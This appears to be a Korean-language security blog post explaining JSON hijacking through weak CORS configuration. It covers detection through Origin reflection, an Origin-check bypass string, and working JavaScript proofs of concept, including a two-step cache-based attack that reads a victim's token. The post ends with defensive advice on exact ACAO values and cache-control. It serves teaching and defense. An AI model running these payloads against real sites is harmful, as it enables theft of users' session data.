JSON Hijacking

🔍 Introduction

JSON Hijacking은 SOP의 예외를 위한 CORS 설정이 미흡한 경우 공격자가 사용자의 데이터 등을 임의로 탈취할 수 있는 공격 방법입니다.

🗡 Offensive techniques

Detect

공격자가 의도한 도메인을 Origin 헤더로 전송하여 ACAO 헤더(Access-Control-Allow-Origin)에 반영된다면 취약 하다고 판단할 수 있습니다. 일부 Wildcard(*)로 ACAO 헤더가 오는 경우가 있는데, 이러한 경우 모든 도메인에서 호출할 수 있지만, Access-Control-Allow-Credentials와 별개로 사용자의 쿠키를 붙여서 전송할 수 없게 됩니다. 자세한 내용은 이전 포스트를 참고해주세요.

1
2


GET /get-info.json HTTP/1.1
Origin: https://www.hahwul.com

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


HTTP/1.1 200 OK
Server: nginx
Content-Type: application/json
Content-Length: 223
Connection: keep-alive
Last-Modified: Fri, 03 Sep 2021 01:43:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Access-Control-Allow-Origin: https://www.hahwul.com
Access-Control-Allow-Credentials: true
Vary: Origin

Exploitation

ACAO에 공격자가 의도한 도메인을 반영할 수 있다면 해당 도메인에선 사용자의 세션을 이용하여 데이터를 가져올 수 있다는 것을 의미합니다.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


var http = new XMLHttpRequest();
http.open("GET", "https://weak-service/get-info.json", true);

http.setRequestHeader("Content-Type","application/json");
http.withCredentials = true;
http.onreadystatechange = function() {
    if(http.readyState == 4 && http.status == 200) {
        console.info(http.status);
        console.info(http.responseText);
        document.write("Responsed data<hr>"+http.responseText);
    } else {
        document.write("Error");
    }
}
http.send();

Bypass protection

Bypass Origin

Origin 헤더에 대해 검증하는 절차가 있는 경우 어떤 형태로 검증 하는지 파악해야합니다. 정확하게 도메인을 식별한다면 우회가 어렵겠지만, 문자열 또는 정규식 기반으로 식별하는 경우 우회할 가능성이 높습니다.

1

Origin: trust.domain.attacker.domain

Origin의 경우 Referer 헤더와 다르게 Path가 붙지 않기 때문에 도메인을 이용한 우회 방법이 최선입니다.

Bypass with Caching

ACAO가 Wildcard(*)인 상태는 일반적으로 유저 세션을 사용할 수 없어 JSON Hijacking이 불가능하지만, 만약 JSON Response 페이지의 Cache-Control로 인해 로컬 캐싱되는 경우 SOP를 우회하여 정보를 가져올 수 있습니다.

1

Access-Control-Allow-Origin: *

Cached 데이터를 읽는 과정은 실제 서버로 데이터를 요청하지 않고 브라우저 내에 저장된 데이터를 바로 읽어 사용자에게 제공합니다. 이걸 이용하여 공격자가 중요 정보가 있는 페이지를 사용자의 세션으로 캐싱시킨 후 ACAO가 Wildcard인 상태에서 이미 캐시된 결과를 읽어오는 형태로 SOP를 통과할 수 있습니다. (왜냐면 Origin 정책이 wildcard 일 때 인증을 포함하지 않는 요청은 response를 읽을 수 있기 때문이죠 😁)

예를들어 인증 상태에서만 사용자 정보를 내려주는 페이지가 있다고 가정합시다.

With Auth

1
2
3
4
5
6


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=3600
...

{"username":"hahwul","token":"ABCDEFG123456"}

Without Auth

1
2
3
4


HTTP/1.1 403 FORBIDDEN
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=3600
...

이 때 ACAO가 * 인 상태에서 CSRF와 같이 SOP의 영향을 받지 않는 요청(img, form, etc…)을 통해 HTTP Request를 전송합니다.

1

<img src="https://vuln.hahwul.com/get-token">

그러면 아래와 같이 사용자 정보를 포함한 요청이 Response로 전달됩니다. 당연히 공격코드는 이를 읽을 수 없습니다. 단 response 내 cache-control로 인해 해당 데이터는 사용자의 브라우저에 캐시됩니다.

1
2
3
4
5


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=3600

{"username":"hahwul","token":"ABCDEFG123456"}

이제 withCredentials를 false로 주고 $.ajax를 통해 HTTP Request를 전송해봅시다. ACAO가 *이기 떄문에 이 코드는 Response의 데이터를 핸들링할 수 있습니다. 다만 사용자의 쿠키정보는 웹 요청에 포함되지 않습니다.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


$.ajax({
      url: "https://vuln.hahwul.com/get-token",
      type: "get",
      xhrFields: {
        withCredentials: false
      },
      headers: {
          "Accept":"application/json",
          "Accept-Language":"ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3",
      },
      success: function (data) {
          console.info(data);
      }
  });

이 때 웹 브라우저는 캐시된 데이터를 읽어오기 때문에 body에 아래 정보가 포함되어 response로 전달됩니다.

1

{"username":"hahwul","token":"ABCDEFG123456"}

그러면 공격자는 SOP를 무시하고 사용자의 정보를 탈취할 수 있습니다. 전체 공격 플로우를 담은 코드는 아래와 같고, 자세한 내용은 예전에 작성한 글을 참고해주세요 :D

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32


<!-- Step1, Caching with Auth -->
<script>  
var url = "https://vuln.hahwul.com/get-token";  
fetch(url, {    
    method: 'GET',    
    cache: 'force-cache'
    });
</script>
<!-- Sometimes, it is convenient to use the img tag when it is cached by default. -->
<!-- <img src="https://vuln.hahwul.com/get-token"> -->

<!-- Step2, Get Userdata without Auth(Using cache)-->
<script>
//delay for cached
setTimeout(function (){
  // get information without auth
  $.ajax({
      url: "https://vuln.hahwul.com/get-token",
      type: "get",
      xhrFields: {
        withCredentials: false
      },
      headers: {
          "Accept":"application/json",
          "Accept-Language":"ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3",
      },
      success: function (data) {
          console.info(data);
      }
  });
}, 2000);
</script>

🛡 Defensive techniques

CORS 사용이 필요한 페이지에선 ACAO 헤더에 대해 도메인을 정확하게 내려주는 것이 좋습니다. 만약 로컬에서만 호출되는 페이지라면 ACAO 헤더 자체를 사용하지 않는 것이 가장 좋습니다.

또한 민감정보의 경우 Response 내 cache-control을 적절히 설정하여 (no-cache 등) 데이터가 로컬 브라우저에 파일로 캐시되지 않도록 처리해주는 것이 좋습니다. (특히 ACAO *을 허용하는 경우)